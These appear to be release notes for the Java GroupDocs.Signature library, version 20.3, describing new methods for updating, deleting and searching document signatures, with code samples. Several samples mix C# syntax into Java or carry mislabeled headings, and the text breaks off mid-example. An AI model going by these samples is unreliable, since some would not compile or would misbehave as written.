SIGNATURENET-2391 Implement Delete method to remove existing document signatures New Feature
SIGNATURENET-2326 Implement Update method to modify existing document signatures New Feature
SIGNATURENET-2473 Implement support of Digital signatures for Spreadsheet document under .NET Standard 2.0 framework Improvement
SIGNATURENET-2472 Improve method ToList Improvement
SIGNATURENET-2434 Provide ICloneable interface implementation for all signature types Improvement
SIGNATURENET-2431 Override Equals / GetHashCode methods for all signatures to have compare ability Improvement
SIGNATURENET-2425 Generate new ProjectGuid and UpgradeCode for MSI package Improvement
SIGNATURENET-2404 Implement support enumeration type properties of embedded custom objects for QR-Code signatures Improvement
SIGNATURENET-2403 Improve exceptions usage Improvement
SIGNATURENET-2387 Allow adding Digital signatures to already signed Spreadsheet documents without removing previous signatures Improvement
SIGNATURENET-1465 Implement exceptions for required or incorrect password when load document Improvement
SIGNATURENET-2400 SaveOptions value OverwriteExistingFile with default value as false to prevent saving to the same file Bug
SIGNATURENET-2382 Compatibility issues under .NET Standard 2.0 Bug
SIGNATURENET-2508 Sign process inserts wrong empty metadata for signatures information Bug
Public API and Backward Incompatible Changes
Public class BarcodeSignature was updated
propertyEncodeTypewas marked as read-only
property Textwas marked as read-only
new public constructor BarcodeSignature(string signatureId) was added with string argument as unique signature identifier that could obtained bySearchorSignmethods**. **Its value provides unique signature identification. When signing document **Sign** method returns newly created signatures with this property set. So once signature was added to the document it can be identified by assigned **SignatureId** property. The same is true for document Search.
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing instance of object.
method Equalswas overridden to support object equals checking
Since 20.3 version there’s ability to manipulate signatures like updating its properties or remove signatures from the document. To provide signature identification unique identifier was added. Newly added constructor allows to create signature with this identifier.
Updated class BarcodeSignature with EncodeType, Text properties and constructor
/** * <p> * Contains Barcode Signature properties. * </p> */ public class BarcodeSignature extends BaseSignature { /** * <p> * Specifies the Barcode Encode Type. * </p> */ public final BarcodeType getEncodeType(){} /** * <p> * Specifies text of Barcode. * </p> */ public final String getText(){} /** * <p> * Initialize BarcodeSignature object with signature identifier that was obtained after search process. * This unique identifier is used to find additional properties for this signature from document signature information layer. * </p> * @param signatureId Unique signature identifier obtained by Sign or Search method of Signature class {@link Signature}. */ public BarcodeSignature(String signatureId){}
Example:
following example demonstrates using Update method with BarcodeSignature created by known Signature Id value;
Update Barcode Signature in the document by known signature id
// initialize Signature instance Signature signature = new Signature("signed.xlsx"); // read from some data source signature Id value String signatureId = "1dd21cf3-b904-4da9-9413-1ff1dab51974"; BarcodeSignature barcodeSignature = new BarcodeSignature(signatureId); barcodeSignature.setWidth(150); barcodeSignature.setHeight(150); barcodeSignature.setLeft(200); barcodeSignature.setTop(200); // update all found signatures boolean updateResult = signature.update("signed.xlsx",barcodeSignature); if (updateResult) { System.out.print("Signature with Barcode '"+barcodeSignature.getText()+"' and encode type '"+barcodeSignature.getEncodeType().getTypeName()+"}' was updated."); } else { System.out.print("Signature was not updated in the document! It was not found!"); }
Public class BaseSignature was updated to support modifying signature in the document.
properties Top,Left,WidthandHeightare marked as editable to adjust signature location and size in the document
added new editable property **string SignatureId. **Its value provides unique signature identification. When signing document Sign method returns newly created signatures with this property set. So once signature was added to the document it can be identified by assigned SignatureIdproperty. The same is true for document Search.
added new editable Boolean property **bool IsSignature. **This property specifies if document component (text/image/barcode/qr-code) is the actual signature or element of document content. By default all found signatures in the document are marked as signature (setSignature(true)). When particular signature object is created (over Sign method, Search or manually) this property could be changed to false, that will indicate that this component is no longer will be treated as signature object and over Updatemethod saved to document
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing instance of object.
method Equalswas overridden to support object equals checking
All these properties could be used for signatures modifying.
class BaseSignature
/** * <p> * Describes base class for signatures. * </p> */ public abstract class BaseSignature implements ICloneable { /** * <p> * Specifies top position of signature. * </p> */ public final int getTop(){} /** * <p> * Specifies top position of signature. * </p> */ public final void setTop(int value){} /** * <p> * Specifies left position of signature. * </p> */ public final int getLeft(){} /** * <p> * Specifies left position of signature. * </p> */ public final void setLeft(int value){} /** * <p> * Specifies width of signature. * </p> */ public final int getWidth(){} /** * <p> * Specifies width of signature. * </p> */ public final void setWidth(int value){} /** * <p> * Specifies height of signature. * </p> */ public final int getHeight(){} /** * <p> * Specifies height of signature. * </p> */ public final void setHeight(int value){} /** * <p> * Unique signature identifier to modify signature in the document over Update or Delete methods. * This property will be set automatically after Sign or Search method being called. * If this property was saved before it can be set manually to manipulate the signature. * </p> */ public final String getSignatureId(){} /** * <p> * Get or set flag to indicate if this component is Signature or document content. * This property is being used with Update method to set element as signature (true) or document element (false). * </p> */ public final boolean isSignature(){} /** * <p> * Get or set flag to indicate if this component is Signature or document content. * This property is being used with Update method to set element as signature (true) or document element (false). * </p> */ public final void setSignature(boolean value){} }
Public class **DeleteResult **was added to keep result of Delete method of Signature class.
This class implements newly added interface IResult that specifies succeeded and failed signatures after process.
New public class DeleteResult
/** * <p> * Result of signature(s) deletion from the document. * </p> */ public class DeleteResult implements IResult { /** * <p> * List of successfully deleted signatures . * </p> */ public final java.util.List<BaseSignature> getSucceeded() {} /** * <p> * List of signatures that were not deleted . * </p> */ public final java.util.List<BaseSignature> getFailed() { } }
property Succeededcontains list of signatures that were successfully deleted from the document.
property Failedcontains list of signatures that were not removed from the document.
Signature passed to method Delete may not be removed from the document for several reasons:
signature was passed only with property** SignatureId** identifier that was not found at document signature information layer;
signature was passed after Search method with correct properties, but was not found inside document with these coordinates, size or other properties that identifies unique signature.
signature was passed with “wrong” properties like not actual SignatureId, coordinatesLeft,Top,WidthorHeight, same as Text for text signatures orBarcodeTypefor barcode signatures
Following example demonstrates using Delete method and analyzing DeleteResult response
Delete Text Signatures from the document
// instantiating the signature object Signature signature = new Signature("signed.pdf"); try { TextSearchOptions options = new TextSearchOptions(); // search for text signatures in document List<TextSignature> signatures = signature.search(TextSignature.class,options); if(signatures.size() > 0) { TextSignature textSignature = signatures.get(0); boolean result = signature.delete("signed.pdf",textSignature); if(result) { System.out.print("Signature with Text " + textSignature.getText() + " was deleted from document [" + fileName + "]."); } else { System.out.print("Signature was not deleted from the document! Signature with Text " + textSignature.getText() + " was not found!"); } } } catch (Exception e) { throw new GroupDocsSignatureException(e.getMessage()); }
Public class DigitalSignature was updated with changes
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing object instance;
method Equalswas overridden to support object equality checking.
Public class ImageSignature was updated
property int Sizewas marked as read-only
new public constructor ImageSignature(string signatureId) was added with string argument as unique signature identifier that could be obtained bySearchorSignmethods**. **Its value provides unique signature identification. When signing document Sign method returns newly created signatures with this property set. So once signature was added to the document it can be identified by assigned **SignatureId** property. The same is true for document Search.
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing object instance.
method Equalswas overridden to support object equality checking
Since 20.3 version there’s ability to manipulate signatures like updating its properties or remove signatures from the document. To provide signature identification unique identifier was added. Newly added constructor allows to create signature with this identifier.
Updated class ImageSignature with Size property and constructor
/** * <p> * Contains Image signature properties. * </p> */ public class ImageSignature extends BaseSignature { /** * <p> * Specifies the size in bytes of signature image. * </p> */ public final int getSize(){} /** * <p> * Specifies the size in bytes of signature image. * * </p> */ public final void setSize(int value){} /** * <p> * Initialize ImageSignature object with signature identifier that was obtained after search process. * This unique identifier is used to find additional properties for this signature from document signature information layer. * </p> */ public ImageSignature(String signatureId){} }
Following example demonstrates using Update method with ImageSignature
Update Image Signature in the document
// initialize Signature instance Signature signature = new Signature(outputFilePath); try { ImageSearchOptions options = new ImageSearchOptions(); // search for image signatures in document List<ImageSignature> signatures = signature.search(ImageSignature.class, options); if (signatures.size() > 0) { ImageSignature imageSignature = signatures.get(0); boolean result = signature.update(outputFilePath,imageSignature); if (result) { System.out.print("Image signature at location "+imageSignature.getLeft() + "x"+imageSignature.getTop()+" and Size "+imageSignature.getSize()+" was updated"); } else { System.out.print("Signature was not updated in the document! It was not found!"); } } } catch (Exception e) { throw new GroupDocsSignatureException(e.getMessage()); }
Public interface** IResult **was added to specify signatures process result common properties.
This interface keeps two lists of signatures, one for successfully processed signatures and another one for failed ones.
New public interface IResult
** * <p> * Common interface for signature process result. * </p> */ public interface IResult { /** * <p> * List of successfully processed signatures . * </p> */ public java.util.List<BaseSignature> getSucceeded(); /** * <p> * List of signatures that were not processed . * </p> */ public java.util.List<BaseSignature> getFailed(); }
read-only property Succeededspecifies list of signatures that were successfully processed.
for Signprocess this is a list of newly created signatures (seeSignResult),
for Updatemethod this property keeps a list of successfully updated signatures (seeUpdateResult),
for Deletemethod this property keeps a list of successfully deleted signatures (seeDeleteResult)
property Failedspecifies list of signatures that were not successfully processed.
for Signprocess this is a list of newly created signatures (seeSignResult),
for Updatemethod this property keeps a list of successfully updated signatures (seeUpdateResult),
for Deletemethod this property keeps a list of successfully deleted signatures (seeDeleteResult)
See different examples for various methods
Public class MetadataSignature was updated
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing object instance.
method Equalswas overridden to support object equality checking.
Public class QrCodeSignature was updated
propertyEncodeTypewas marked as read-only
property Textwas marked as read-only
new public constructor QrCodeSignature(string signatureId) was added with string argument as unique signature identifier that could be obtained bySearchorSignmethods**. **Its value provides unique signature identification. When signing document **Sign** method returns newly created signatures with this property set. So once signature was added to the document it can be identified by assigned **SignatureId** property. The same is true for document Search.
class implements ICloneableinterface that means ability to callClonemethod to obtain copy of existing object instance.
method Equalswas overridden to support object equality checking.
Since 20.3 version there’s an ability to manipulate signatures like updating its properties or remove signatures from the document. To provide signature identification unique identifier was added. Newly added constructor allows to create signature with this identifier.
Updated class QrCodeSignature with EncodeType, Text properties and constructor
/** * <p> * Contains QR-code signature properties. * </p> */ public class QrCodeSignature extends BaseSignature { /** * <p> * Specifies the QR-code Encode Type. * </p> */ public final QrCodeType getEncodeType(){} /** * <p> * Specifies text of QR-code. * </p> */ public final String getText(){} /** * <p> * Initialize QrCodeSignature object with signature identifier that was obtained after search process. * This unique identifier is used to find additional properties for this signature from document signature information layer. * </p> */ public QrCodeSignature(String signatureId){ } }
Following example demonstrates using Delete method with QrCodeSignature created by known Signature Id value;
Update QR-code Signature in the document by known signature id
// initialize Signature instance Signature signature = new Signature("signed.pdf"); try { // read from some data source signature Id value string signatureId = "47512fb5cf71477dbecc4170ec918860"; QrCodeSignature qrCodeSignature = new QrCodeSignature(signatureId); boolean result = signature.delete(outputFilePath,qrCodeSignature); if (result) { System.out.print("Signature with QR-Code "+qrCodeSignature.getText()+" and encode type "+qrCodeSignature.getEncodeType().getTypeName()+" was deleted."); } else { System.out.print("Signature was not deleted from the document! Signature with Barcode "+qrCodeSignature.getText()+" and encode type "+qrCodeSignature.getEncodeType().getTypeName()+" was not found!"); } } catch (Exception e) { throw new GroupDocsSignatureException(e.getMessage()); }
Public class **SignResult **was added
This class implements newly added interface IResult that specifies succeeded and failed signatures after process.
New public class SignResult
/** * <p> * Result of signing process for document with newly created signatures. * </p> */ public class SignResult implements IResult { /** * <p> * List of newly created signatures . * </p> */ public final java.util.List<BaseSignature> getSucceeded() {} /** * <p> * List of signatures that were failed to create. * </p> */ public final java.util.List<BaseSignature> getFailed() {} }
property Succeededcontains a list of signatures that were successfully created in the document.
property Failedcontains list of signatures that were failed to create due to internal errors or exception.
Following example demonstrates using Sign method and analyzing SignResult response
Sign document and analyze result
// instantiating the signature object Signature signature = new Signature("sample.pdf"); try { // create QRCode option with predefined QRCode text QrCodeSignOptions options = new QrCodeSignOptions("JohnSmith"); options.setEncodeType(QrCodeTypes.QR); options.setHorizontalAlignment(HorizontalAlignment.Right); options.setVerticalAlignment(VerticalAlignment.Bottom); // sign document to file SignResult signResult = signature.sign("signed.pdf", options); if (signResult.getFailed().size() == 0) { System.out.print("\nAll signatures were successfully created!"); } else { System.out.print("Successfully created signatures : "+signResult.getSucceeded().size()); System.out.print("Failed signatures : "+signResult.getFailed().size()); } System.out.print("\nList of newly created signatures:"); int number = 1; for (BaseSignature temp : signResult.getSucceeded()) { System.out.print("Signature #"+ +number++ +": Type: "+temp.getSignatureType()+" Id:"+temp.getSignatureId()+", Location: "+temp.getLeft()+"x"+temp.getTop()+". Size: "+temp.getWidth()+"x"+temp.getHeight()); } }catch(Exception e){ throw new GroupDocsSignatureException(e.getMessage()); }
Public class TextSignature was updated
property
Textwas marked as editable and now it can be changed when modifying signatures
property
TextSignatureImplementation SignatureImplementationwas marked as read-only since current signature class does not support changing implementation of Text Signature.
new public constructor
TextSignature(string signatureId) was added with string argument as unique signature identifier that could be obtained bySearchorSignmethods**. **Its value provides unique signature identification. When signing document **Sign** method returns newly created signatures with this property set. So once signature was added to the document it can be identified by assigned **SignatureId** property. The same is true for document Search.
class implements
ICloneableinterface that means ability to callClonemethod to obtain copy of existing object instance.
method
Equalswas overridden to support object equality checking.
Since 19.12 version there’s an ability to manipulate signatures like updating its properties or remove signatures from the document. To provide signature identification unique identifier was added. Newly added constructor allows to create signature with this identifier.
Updated class TextSignature with constructor
/** * <p> * Contains Text signature properties. * </p> */ public class TextSignature extends BaseSignature { /** * <p> * Specifies text in signature. * </p> */ public final String getText(){ } /** * <p> * Specifies text in signature. * </p> */ public final void setText(String value){} /** * <p> * Specifies text signature implementation. * </p> */ public int getSignatureImplementation(){} /** * <p> * Initialize TextSignature object with signature identifier that was obtained after search process. * This unique identifier is used to find additional properties for this signature from document signature information layer. * </p> */ public TextSignature(String signatureId){} }
Following example demonstrates using Update method with TextSignature obtained from Search method
Update Text Signature in the document after Search
// initialize Signature instance Signature signature = new Signature("signed.pdf"); TextSearchOptions options = new TextSearchOptions(); List<TextSignature> signatures = signature.search(TextSignature.class, options); if(signatures.size()> 0) { TextSignature textSignature = signatures [0]; // change Text property textSignature.setText("John Walkman"); // change position textSignature.setLeft(textSignature.getLeft() + 100); textSignature.setTop(textSignature.getTop() + 100); // change size. Please note not all documents support changing signature size textSignature.setWidth(200); textSignature.setHeight(100); bool result = signature.update("signed.pdf",textSignature); if (result) { System.out.print("Signature with Text '" + textSignature.getText() + "' was updated in the document ['signed.pdf']."); } else { System.out.print("Signature was not updated in the document! Signature with Text '" + textSignature.getText() + "' was not found!"); } } }
Public class **UpdateResult **was added
This class implements newly added interface IResult that specifies succeeded and failed signatures after process.
New public class DeleteResult
/** * <p> * Result of modification of signatures in the document. * </p> */ public class UpdateResult implements IResult { /** * <p> * List of successfully modified signatures. * </p> */ public final java.util.List<BaseSignature> getSucceeded() {} /** * <p> * List of signatures that were not updated . * </p> */ public final java.util.List<BaseSignature> getFailed() { } }
property Succeededcontains list of signatures that were successfully updated in the document.
property Failedcontains list of signatures that were passed as an argument, but not found in the document so was not updated.
Few reasons when passed signature to method Update was not processed (updated) in the document
signature was passed only with property** SignatureId** identifier (see changes of **BaseSignature**) that was not found at document signature information layer;
signature was passed after Search method with correct properties, but was not found in a document with these coordinates, size or other properties that identifies unique signature.
signature was passed with “wrong” properties like not actual SignatureId, coordinatesLeft,Top,WidthorHeight, same as Text for text signatures orBarcodeTypefor barcode signatures
Following example demonstrates using Update method and analyzing UpdateResult response
Search document for Text Signatures
// initialize Signature instance Signature signature = new Signature("signed.pdf"); // read from some data source signature Id value String[] signatureIdList = new String[] { "1dd21cf3-b904-4da9-9413-1ff1dab51974", "b0123987-b0d4-4004-86ec-30ab5c41ac7e" }; // create list of Barcode Signature by known SignatureId List<BaseSignature> signatures = new ArrayList<BaseSignature>(); for (String item : signatureIdList) { TextSignature temp = new TextSignature("1dd21cf3-b904-4da9-9413-1ff1dab51974"); temp.setWidth(150); temp.setHeight(150); temp.setLeft(200); temp.setTop(200); signatures.add(temp); } // update all found signatures UpdateResult updateResult = signature.update("signed.pdf",signatures); if (updateResult.getSucceeded().size() == signatures.size()) { System.out.print("\nAll signatures were successfully updated!"); } else { System.out.print("Successfully updated signatures : "+updateResult.getSucceeded().size()); System.out.print("Not updated signatures : "+updateResult.getFailed().size()); }
Public class IncorrectPasswordException can be used to handle scenario when incorrect password were provided at LoadOptions for password protected documents.
This exception will be thrown once Signature class will try to access protected file.
New public class DeleteResult
/** * <p> * The exception that is thrown when specified password is incorrect. * </p> */ public class IncorrectPasswordException extends GroupDocsSignatureException { }
class inherits common GroupDocsSignatureException
exception message contains only common information message “Specified password is incorrect.”
please be aware that when password is not specified for protected documents another exception occurs, see IncorrectPasswordException
Following example demonstrates analyzing different errors with incorrect password exception
Handling Exceptions example
// initialize LoadOptions with incorrect Password LoadOptions loadOptions = new LoadOptions(); loadOptions.setPassword("1"); final Signature signature = new Signature(filePath, loadOptions); try { QrCodeSignOptions options = new QrCodeSignOptions("JohnSmith"); options.setEncodeType(QrCodeTypes.QR); options.setLeft(100); options.setTop(100); // try to sign document to file, we expect for PasswordRequiredException signature.sign("sample.pdf", options); System.out.print("\nSource document signed successfully.\nFile saved at " + outputFilePath); } catch (IncorrectPasswordException ex) { System.out.print("HandlingIncorrectPasswordException: " + ex.getMessage()); } catch (GroupDocsSignatureException ex) { System.out.print("Common GroupDocsSignatureException: " + ex.getMessage()); } catch (java.lang.RuntimeException ex) { System.out.print("Common Exception happens only at user code level: " + ex.getMessage()); }
Added new boolean HideSignatures property to **PreviewOptions **class.
This property indicates whether signatures that were marked as IsSignature = true should be hidden from document preview or not**. **For more information see **BaseSignature.**
class PreviewOptions
/** * <p> * Represents document preview options. * </p> */ public class PreviewOptions { /** * <p> * Gets or sets flag to hide signatures from page preview image. * Only signatures are marked as IsSignature will be hidden from generated document page image. * </p> */ public final boolean getHideSignatures(){} /** * <p> * Gets or sets flag to hide signatures from page preview image. * Only signatures are marked as IsSignature will be hidden from generated document page image. * </p> */ public final void setHideSignatures(boolean value){} }
Following example demonstrates usage of HideSignatures property for hiding signatures in document preview.
Using HideSignatures property for hiding signatures for document preview
public class GeneratePreviewAdvanced { /// <summary> /// Generate document pages preview with using HideSignature feature /// </summary> public static void Run() { // The path to the documents directory. string filePath = Constants.SAMPLE_PDF_SIGNED; using (Signature signature = new Signature(filePath)) { // create preview options object PreviewOptions previewOption = new PreviewOptions(GeneratePreviewAdvanced.CreatePageStream, GeneratePreviewAdvanced.ReleasePageStream) { PreviewFormat = PreviewOptions.PreviewFormats.JPEG, // set property to hide all known signatures HideSignatures = true }; // generate preview signature.GeneratePreview(previewOption); } } private static Stream CreatePageStream(int pageNumber) { string imageFilePath = Path.Combine(Constants.OutputPath, "GeneratePreviewHideSignatures", "image-" + pageNumber.ToString() + ".jpg"); string folder = Path.GetDirectoryName(imageFilePath); if (!Directory.Exists(folder)) { Directory.CreateDirectory(folder); } return new FileStream(imageFilePath, FileMode.Create); } private static void ReleasePageStream(int pageNumber, Stream pageStream) { pageStream.Dispose(); string imageFilePath = Path.Combine(Constants.OutputPath, "GeneratePreviewHideSignatures", "image-" + pageNumber.ToString() + ".jpg"); Console.WriteLine("Image file {0} is ready for preview", imageFilePath); } } public class GeneratePreviewAdvanced { /** * <p> * Generate document pages preview with using HideSignature feature * </p> */ public static void run() { // The path to the documents directory. String filePath = "C:\\sample.pdf"; final Signature signature = new Signature(filePath); try { // create preview options object PreviewOptions previewOption = new PreviewOptions(new PageStreamFactory() { @Override public OutputStream createPageStream(int pageNumber) { return generateStream(pageNumber); } @Override public void closePageStream(int pageNumber, OutputStream pageStream) { releasePageStream(pageNumber, pageStream); } }); previewOption.setPreviewFormat(PreviewFormats.JPEG); previewOption.setHideSignatures(true); // generate preview signature.generatePreview(previewOption); }catch (Exception e){ throw new GroupDocsSignatureException(e.getMessage()); } } private static OutputStream generateStream(int pageNumber) { try { Path path = Paths.get("C:\\GeneratePreviewHideSignatures\\"); if (!Files.exists(path)) { Files.createDirectory(path); System.out.println("Directory created"); } else { System.out.println("Directory already exists"); } File filePath = new File(path+"\\image-"+pageNumber+".jpg"); return new FileOutputStream(filePath); }catch (Exception e){ throw new GroupDocsSignatureException(e.getMessage()); } } private static void releasePageStream(int pageNumber, OutputStream pageStream) { try { pageStream.close(); String imageFilePath = new File("C:\\GeneratePreviewHideSignatures", "image-" +pageNumber + ".jpg").getPath(); System.out.print("Image file "+imageFilePath+" is ready for preview"); }catch (Exception e){ throw new GroupDocsSignatureException(e.getMessage()); } } }
Added new boolean property SkipExternal to SearchOptions class.
This property indicates if Search result should return external signatures (external signatures are the signatures that were added with an 3rd party software and not with GroupDocs.Signature).
Since 20.3 every time when document is being signed information about document signatures are stored in document’s metadata. Which means that all created signatures by GroupDocs.Signature can be distinguished from an actual document content and BaseSignature.IsSignature flag will be set as true. BaseSignature.IsSignature property specifies if document component (text/image/barcode/qr-code) is the actual signature or element of document content.
In order to convert signatures added by 3rd party software or by previous version of GroupDocs.Signature, just run Search with **SearchOptions.**SkipExternal property set to false and update BaseSignature.IsSignature for each signature returned by the search result.
There are few ways to manipulate with document signature search results:
If signature is no longer required it can be removed from the document by Deletemethod;
Signature could be marked as document native content by setting up IsSignature = falseproperty,in this caseSearchOptions.SkipExternalfield will allowSearchmethod to skip this signature;
Signatures that were added before 20.3 are treated as non signatures because information about them are not yet stored in the document. Setting SkipExternalflag totruewill exclude these signatures from **Search **result.
class PreviewOptions
/** * <p> * Represents the extract signatures from document options. * </p> */ public abstract class SearchOptions { /** * <p> * Flag to return only signatures marked as IsSignature. By default value is false that indicates to return all signatures that match specified criteria. * </p> */ public final boolean getSkipExternal(){} /** * <p> * Flag to return only signatures marked as IsSignature. By default value is false that indicates to return all signatures that match specified criteria. * </p> */ public final void setSkipExternal(boolean value){} }
**Example 1. Excluding non signatures from search
**
Following example demonstrates usage of SkipExternal property for excluding non actual signatures from search result
Using SearchOptions SkipExternal property to exclude non actual signatures from search
Signature signature = new Signature("sample_signed.pdf"); TextSearchOptions options = new TextSearchOptions(); options.setSkipExternal(true); options.setAllPages(false); // search for text signatures in document List<TextSignature> signatures = signature.search(TextSignature.class,options); System.out.print("\nSource document contains following text signature(s)."); for (TextSignature sign : signatures) { if (sign != null) { System.out.print("Found Text signature at page "+sign.getPageNumber()+" with type ["+sign.getSignatureImplementation()+"] and text '"+sign.getText()+"'."); System.out.print("Location at "+sign.getLeft()+"-"+sign.getTop()+". Size is "+sign.getWidth()+"x"+sign.getHeight()+"."); } }
**Example 2. Updating signatures from GroupDocs.Signature 19.11 and below
**
Following examples shows the way to mark signatures in document as actual signatures (BaseSignature.IsSignature = true)
How to mark signatures in document as actual signatures
// initialize Signature instance Signature signature = new Signature("sample_signed.pdf"); try { // define few search options BarcodeSearchOptions barcodeOptions = new BarcodeSearchOptions(); QrCodeSearchOptions qrCodeOptions = new QrCodeSearchOptions(); // add options to list List<SearchOptions> listOptions = new ArrayList<SearchOptions>(); listOptions.add(barcodeOptions); listOptions.add(qrCodeOptions); // search for signatures in document SearchResult result = signature.search(listOptions); if (result.getSignatures().size() > 0) { System.out.print("\nTrying to update all signatures..."); // mark all signatures as actual Signatures for (BaseSignature baseSignature : result.getSignatures()) { baseSignature.setSignature(true); } // update all found signatures UpdateResult updateResult = signature.update("sample_signed.pdf",result.getSignatures()); if (updateResult.getSucceeded().size() == result.getSignatures().size()) { System.out.print("\nAll signatures were successfully updated!"); } else { System.out.print("Successfully updated signatures : "+updateResult.getSucceeded().size()); System.out.print("Not updated signatures : "+updateResult.getFailed().size()); } System.out.print("\nList of updated signatures:"); int number = 1; for (BaseSignature temp : updateResult.getSucceeded()) { System.out.print("Signature #"+ number++ +": Type: "+temp.getSignatureType()+" Id:"+temp.getSignatureId()+", Location: "+temp.getLeft()+"x"+temp.getTop()+". Size: "+temp.getWidth()+"x"+temp.getHeight()); } } else { System.out.print("No one signature was found."); }
Public class **PasswordRequiredException **can be used to handle scenario with missing password set up at LoadOptions for password protected documents.
This exception will be thrown once Signature class will try to access protected file.
New public class DeleteResult
/** * <p> * The exception that is thrown when password is required to load the document. * </p> */ public class PasswordRequiredException extends GroupDocsSignatureException { }
class inherits common GroupDocsSignatureException
exception message contains only information message “Please specify password to load the document.”
please be aware that when password is specified but incorrect another exception occurs, see IncorrectPasswordException
Following example demonstrates analyzing different exceptions
Handling Exceptions example
// skip initialization of LoadOptions with Password // LoadOptions loadOptions = new LoadOptions(){ Password = "1234567890" } Signature signature = new Signature("SamplePasswordProtected.pdf"); try { try { QrCodeSignOptions options = new QrCodeSignOptions("JohnSmith"); options.setEncodeType(QrCodeTypes.QR); options.setLeft(100); options.setTop(100); // try to sign document to file, we expect for PasswordRequiredException signature.sign(outputFilePath, options); System.out.print("\nSource document signed successfully.\nFile saved at " + outputFilePath); } catch(PasswordRequiredException ex) { System.out.print("PasswordRequiredException: " + ex.getMessage()); } catch(GroupDocsSignatureException ex) { System.out.print("Common GroupDocsSignatureException: " + ex.getMessage()); } catch (java.lang.RuntimeException ex) { System.out.print("Common Exception happens only at user code level: " + ex.getMessage()); } finally { } }catch (Exception e){ throw new GroupDocsSignatureException(e.getMessage()); }
Main public class Signature was updated with following changes
all existing overload methods
Signwere extended with result as instance of objectSignResult(seeSignResult). This result allows to obtain list of newly created signatures (see changes of base classBaseSignature) with all properties set (like actual location, size, implementation type, and other corresponding signature fields) and new propertiesIsSignature= true and assigned value to internal propertySignatureId.Updated overload method Sign definition
public SignResult sign(java.io.OutputStream document, SignOptions signOptions)
public SignResult sign(java.io.OutputStream document, SignOptions signOptions, SaveOptions saveOptions);
public SignResult sign(java.io.OutputStream document, java.util.List<SignOptions> signOptionsList);
public SignResult sign(java.io.OutputStream document, java.util.List<SignOptions> signOptionsList, SaveOptions saveOptions);
public SignResult sign(String filePath, SignOptions signOptions);
public SignResult sign(String filePath, SignOptions signOptions, SaveOptions saveOptions);
public SignResult sign(String filePath, java.util.List<SignOptions> signOptionsList);
public SignResult sign(String filePath, java.util.List<SignOptions> signOptionsList, SaveOptions saveOptions);
added new overload method **Update **that expects one signature or list of signatures to update in the document. Method with one signature argument returns Boolean value as indicator if process went successfully. Method with list of signatures returns instance of
UpdateResult. SeeUpdateResultwith lists of updated signatures and signatures that were not found. Each of passed signature should be identified with existing signatures in the document. This identification could be provided in two ways. First way when signature was searched right pass toUpdatemethod bySearchmethod. See first example 2How to update signatures after Search. The second way works over unique signature identifierSignatureId. ThisSignatureIdcould be obtained afterSignresult as unique signature identifier stored at document metadata layer. The very important thing here that this method applies changes in same document file or stream. See second exampleHow to update signatures by known IdNew overload method Update definition
public boolean update(OutputStream document, BaseSignature signature);
public UpdateResult update(OutputStream document, java.util.List<BaseSignature> signatures);
public boolean update(String filePath, BaseSignature signature);
public UpdateResult update(String filePath, java.util.List<BaseSignature> signatures);
added new overload method **Delete **that that expects one signature or list of signatures to delete from the document. Method with one signature argument returns Boolean value as indicator if process went successfully. Method with list of signatures returns instance of
DeleteResult. SeeDeleteResultwith lists of removed signatures and signatures that were not found. Same as methodUpdateeach of passed signature should be identified with existing signatures in the document. This identification could be provided by two ways. First way when signature was searched right pass toUpdatemethod bySearchmethod. See first exampleHow to update signatures after Search. The second way works over unique signature identifierSignatureId. ThisSignatureIdcould be obtained afterSignresult as unique signature identifier stored at document metadata layer. The very important thing here that this method applies changes in same document file or stream.
public boolean delete(OutputStream document, BaseSignature signature);
public DeleteResult delete(OutputStream document, java.util.List<BaseSignature> signatures);
public boolean delete(String filePath, BaseSignature signature);
public DeleteResult delete(String filePath, java.util.List<BaseSignature> signatures);
Examples:
How to sign document and analyze result.Following example shows analysis ofSignResultresponse.Signing document with further result analysis
Signature signature = new Signature("sample.pdf");
// create QRCode option with predefined QRCode text
QrCodeSignOptions options = new QrCodeSignOptions("JohnSmith");
options.setEncodeType(QrCodeTypes.QR);
options.setHorizontalAlignment(HorizontalAlignment.Right);
options.setVerticalAlignment(VerticalAlignment.Bottom);
// sign document to file
SignResult signResult = signature.sign("signed.pdf", options);
if (signResult.getFailed().size() == 0)
{
System.out.print("\nAll signatures were successfully created!");
}
else
{
System.out.print("Successfully created signatures : "+signResult.getSucceeded().size());
System.out.print("Failed signatures : "+signResult.getFailed().size());
}
System.out.print("\nList of newly created signatures:");
int number = 1;
for (BaseSignature temp : signResult.getSucceeded())
{
System.out.print("Signature #"+ +number++ +": Type: "+temp.getSignatureType()+" Id:"+temp.getSignatureId()+", Location: "+temp.getLeft()+"x"+temp.getTop()+". Size: "+temp.getWidth()+"x"+temp.getHeight());
}
How to update signatures after. Following example demonstrates using ofSearchSearchmethod to find signatures and then modifying selected signatures withUpdatemethod.Updating signatures after Search
// initialize Signature instance
Signature signature = new Signature("sampleSigned.pdf");
// define few search options
BarcodeSearchOptions barcodeOptions = new BarcodeSearchOptions();
QrCodeSearchOptions qrCodeOptions = new QrCodeSearchOptions();
// add options to list
List<SearchOptions> listOptions = new ArrayList<SearchOptions>();
listOptions.add(barcodeOptions);
listOptions.add(qrCodeOptions);
// search for signatures in document
SearchResult result = signature.search(listOptions);
if (result.getSignatures().size() > 0)
{
System.out.print("\nTrying to update all signatures...");
// mark all signatures as actual Signatures
for (BaseSignature baseSignature : result.getSignatures())
{
baseSignature.setSignature(true);
}
// update all found signatures
UpdateResult updateResult = signature.update("sampleSigned.pdf", result.getSignatures());
if (updateResult.getSucceeded().size() == result.getSignatures().size())
{
System.out.print("\nAll signatures were successfully updated!");
}
else
{
System.out.print("Successfully updated signatures : "+updateResult.getSucceeded().size());
System.out.print("Not updated signatures : "+updateResult.getFailed().size());
}
System.out.print("\nList of updated signatures:");
int number = 1;
for (BaseSignature temp : updateResult.getSucceeded())
{
System.out.print("Signature #"+ number++ +": Type: "+temp.getSignatureType()+" Id:"+temp.getSignatureId()+", Location: "+temp.getLeft()+"x"+temp.getTop()+". Size: "+temp.getWidth()+"x"+temp.getHeight());
}
}
else
{
System.out.print("No one signature was found.");
}
How to update signature using. Following example demonstrates using ofSignatureIdpropertyUpdatemethod to modify signatures using knownSignatureIdproperties.
// initialize Signature instance
Signature signature = new Signature("signed.pdf");
// read from some data source signature Id value
String[] signatureIdList = new String[]
{
